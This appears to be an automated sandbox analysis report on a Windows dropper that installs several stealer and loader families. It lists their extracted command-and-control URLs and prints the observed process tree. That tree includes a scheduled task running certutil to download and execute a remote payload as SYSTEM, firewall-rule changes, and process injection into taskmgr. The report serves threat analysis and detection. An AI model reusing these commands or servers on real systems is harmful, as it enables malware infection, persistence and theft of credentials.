Resubmissions
04-10-2024 18:01
241004-wl132axhpm 1022-04-2024 20:52
240422-znvwksgb77 1027-02-2024 22:40
240227-2lykssdc83 1003-01-2024 09:53
240103-lw3dqscehj 1029-12-2023 23:48
231229-3txtxadcb8 10Analysis
-
max time kernel
0s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
03-01-2024 09:53
General
-
Target
078192e792b12a8d9980f364e110155c.exe
-
Size
8.7MB
-
MD5
078192e792b12a8d9980f364e110155c
-
SHA1
89596e27530eeccd6ad9644aa045e8e0499301a1
-
SHA256
67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33
-
SHA512
72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc
-
SSDEEP
196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J
Malware Config
Extracted
ffdroider
http://186.2.171.3
Extracted
smokeloader
pub2
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
raccoon
1.7.3
92be0387873e54dd629b9bfa972c3a9a88e6726c
-
url4cnc
https://t.me/gishsunsetman
Signatures
-
Detect Fabookie payload 1 IoCs
-
FFDroider
Stealer targeting social media platform users first seen in April 2022.
-
FFDroider payload 2 IoCs
-
Fabookie
Fabookie is facebook account info stealer.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 4 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
-
Raccoon Stealer V1 payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars payload 1 IoCs
-
Nirsoft 2 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 21 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Modifies boot configuration data using bcdedit 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Amadey 3 IoCs
amadey_bot.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 1763⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe"C:\Users\Admin\AppData\Local\Temp\Complete.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:22⤵
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes2⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240103095422.log C:\Windows\Logs\CBS\CbsPersist_20240103095422.cab1⤵
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"2⤵
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /94-942⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"3⤵
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v3⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe1⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe2⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1091914815-43854897514514557711330834398924401735-490378816-1972998648707689730"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
712KB
MD5b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
Filesize
1.4MB
MD541b7c6d48d13e1a864bf2d3759e257e6
SHA17ee45121a927d744941651bd6673d3df21f1611b
SHA256820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2
SHA5120ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077
-
Filesize
201KB
MD5b70f516d57624c741cabeebb65cce996
SHA198c27ae9fa2742dfedcf765c5b37d7830673c2ff
SHA25632e4d190cebe0be41e148b8863fad2c8973b1afc9d60238ac9ec1daeb1e1a2d2
SHA512aae21583810803053b0112f720c142de570b75c41d6bb63ae7e870750678478cc7140204c1108b83fee7f53de77e5de2a9752fdff0279563ceea94c2401acf95
-
Filesize
975KB
MD52d0217e0c70440d8c82883eadea517b9
SHA1f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA5126d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
Filesize
92KB
MD59c00f7d3c6751d54314ff8bd19372a83
SHA1eba0dd42316b5bcb22a996153548ef1aa5607063
SHA2566b18805d3fff207428d8443e546a846073d199ac9e080d7493146e736cb7ea8c
SHA5127c1d0f35f564031be5c59e84d805210033d7ee056d897ceddeb2daec40fd6be412d8b8fed16e210e49feff7c400a5f226bdd2326874df68b75c5e810edafb94d
-
Filesize
364KB
-
Filesize
4.2MB
-
Filesize
44.6MB
-
Filesize
4.2MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
4.2MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
304KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
304KB
-
Filesize
5.9MB
-
Filesize
5.9MB
-
Filesize
88KB
-
Filesize
372KB
-
Filesize
1.0MB
-
Filesize
372KB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
304KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
44.6MB
-
Filesize
44.6MB
-
Filesize
9.1MB
-
Filesize
364KB
-
Filesize
44.6MB
-
Filesize
9.1MB
-
Filesize
44.6MB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
8KB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
232KB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
160KB
-
Filesize
9.9MB
-
Filesize
596KB
-
Filesize
596KB
-
Filesize
596KB
-
Filesize
40.4MB
-
Filesize
40.4MB
-
Filesize
1024KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
160KB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
552KB